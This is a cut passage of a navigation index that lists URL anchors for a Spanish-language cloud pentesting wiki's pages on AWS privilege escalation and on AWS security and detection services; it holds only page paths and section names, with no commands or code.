aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddlayerversionpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctionconfiguration","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreatefunctionurlconfig-lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda-mitm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#aws---lightsail-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsail","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsaildownloaddefaultkeypair","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetinstanceaccessdetails","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatebucketaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetrelationaldatabasemasteruserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdaterelationaldatabase","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailopeninstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailputinstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailsetresourceaccessforbucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatebucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatecontainerservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#aws---macie-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#macie","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#amazon-macie---bypass-reveal-sample-integrity-check","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#aws---mediapackage-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotatechannelcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotateingestendpointcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#aws---mq-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mq","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqcreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqlistusers-mqupdateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqupdatebroker","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#aws---msk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msklistclusters-mskupdatesecurity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#aws---rds-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds---servicio-de-base-de-datos-relacional","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsmodifydbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds-dbconnect","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#abuso-de-permisos-de-rol-iam-de-rds","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbcluster-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#aws---redshift-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentialswithiam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftmodifycluster","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#accediendo-a-servicios-externos","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#lambdas","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#dynamo","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#aws---route53-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#route53createhostedzone-route53changeresourcerecordsets-acm-pcaissuecertificate-acm-pcagetcertificate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#aws---sns-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#sns","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snspublish","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snssubscribe","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#aws---sqs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqssendmessage-sqssendmessagebatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws---sso-y-escalación-de-privilegios-en-identitystore","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws-identity-center--aws-sso","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#restablecer-contraseña","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#identitystorecreategroupmembership","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoputinlinepolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachmanagedpolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachcustomermanagedpolicyreferencetopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssocreateaccountassignment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssogetrolecredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachmanagedpolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachcustomermanagedpolicyreferencefrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeleteinlinepolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeletepermissionboundaryfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#aws---organizations-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#organizaciones","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#de-la-cuenta-de-gestión-a-las-cuentas-hijas","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#aws---s3-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketnotification-s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject-opcional-sobre-el-archivo-de-estado-de-terraform","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getbucketacl-s3putbucketacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectversionacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc-1","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#iampassrole-sagemakercreatenotebookinstance-sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreateprocessingjobiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatetrainingjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatehyperparametertuningjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#aws---secrets-manager-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secrets-manager","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetsecretvalue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetresourcepolicy-secretsmanagerputresourcepolicy-secretsmanagerlistsecrets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#aws---ssm-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmsendcommand","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmresumesession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmdescribeparameters-ssmgetparameter--ssmgetparameters","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmgetcommandinvocation-ssmlistcommandinvocations--ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#aws---step-functions-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#step-functions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#recursos-de-tareas","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesteststate--iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statescreatestatemachine--iampassrole--statesstartexecution--statesstartsyncexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesupdatestatemachine--no-siempre-requerido-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#aws---sts-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#sts","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsgetfederationtoken","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithsaml","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithwebidentity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#abuso-de-federación","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#aws---workdocs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocscreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsgetdocument-workdocsdescribeactivities","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddresourcepermissions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddusertogroup","pentesting-cloud/aws-security/aws-services/index.html#aws---servicios","pentesting-cloud/aws-security/aws-services/index.html#tipos-de-servicios","pentesting-cloud/aws-security/aws-services/index.html#servicios-de-contenedores","pentesting-cloud/aws-security/aws-services/index.html#servicios-abstractos","pentesting-cloud/aws-security/aws-services/index.html#enumeración-de-servicios","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/index.html#aws---servicios-de-seguridad-y-detección","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#aws---cloudtrail-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#agregar-registros-de-múltiples-cuentas","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail-de-todas-las-cuentas-de-la-organización-en-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#verificación-de-archivos-de-registro","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#logs-to-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#event-history","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#insights","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#security","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#access-advisor","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#actions","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#inyección-csv","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#evasión-de-detección","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#evasión-de--honeytokens","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#accediendo-a-infraestructura-de-terceros","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#modificando-la-configuración-de-cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#modificando-la-configuración-del-bucket","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#ransomware-de-cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#aws---cloudwatch-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#conceptos-clave","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#namespaces","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#metrics","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#dimensions","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#statistics","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#units","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#características-de-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#dashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#metric-stream-y-metric-data","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#alarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#anomaly-detectors","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#insight-rules-y-managed-insight-rules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-logs","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch-monitoring--events","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#instalación-del-agente","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#post-exploitation--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmscloudwatchputmetricalarm--cloudwatchputcompositealarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmactions-cloudwatchenablealarmactions-cloudwatchsetalarmstate","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteanomalydetector-cloudwatchputanomalydetector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletedashboards-cloudwatchputdashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteinsightrules-cloudwatchputinsightrule-cloudwatchputmanagedinsightrule","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdisableinsightrules-cloudwatchenableinsightrules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletemetricstream--cloudwatchputmetricstream--cloudwatchputmetricdata","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchstopmetricstreams-cloudwatchstartmetricstreams","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchtagresource-cloudwatchuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws---config-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#functioning","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#config-rules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#aws---control-tower-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#control-tower","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#post-explotación-y-persistencia","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#aws---cost-explorer-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#cost-explorer-y-detección-de-anomalías","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#presupuestos","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#aws---detective-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#detective","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#aws---firewall-manager-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#firewall-manager","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#prerequisites","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#types-of-protection-policies","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#administrator-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#post-explotación--bypass-de-detección","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#organizationsdescribeorganization--fmsassociateadminaccount-fmsdisassociateadminaccount-fmsputadminaccount","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputpolicy-fmsdeletepolicy","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsbatchassociateresource-fmsbatchdisassociateresource-fmsputresourceset-fmsdeleteresourceset","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputappslist-fmsdeleteappslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputprotocolslist-fmsdeleteprotocolslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputnotificationchannel-fmsdeletenotificationchannel","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsassociatethirdpartyfirewall-fmsdisssociatethirdpartyfirewall","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmstagresource-fmsuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#aws---guardduty-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#ejemplo-de-hallazgos","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#todos-los-hallazgos","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#múltiples-cuentas","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#bypass-de-guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guía-general","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#rompiendo-guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#ejemplos-específicos-de-bypass-de-hallazgos","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#aws---inspector-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#aws---inspector-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#inspector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-elements","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#aws---security-hub-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#security-hub","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#bypass-detection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#aws---shield-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#shield","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws---enumeración-de-trusted-advisor","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws---enumeración-de-trusted-advisor-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#visión-general-de-aws-trusted-advisor","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#notificaciones-y-actualización-de-datos","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#desglose-de-verificaciones","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws---waf-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws---waf-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws-waf","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#conceptos-clave","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#características-clave","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#post-explotación--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#aws---enumeración-de-api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#tipos-de-api-gateways","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#componentes-principales-de-api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#registro","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#diferentes-autorizaciones-para-acceder-a-los-endpoints-de-api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#política-de-recursos","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#autenticador-iam","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#request-signing-using-python","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#autorizador-lambda-personalizado","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#clave-api-requerida","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#persistencia","pentesting-cloud/aws-security/a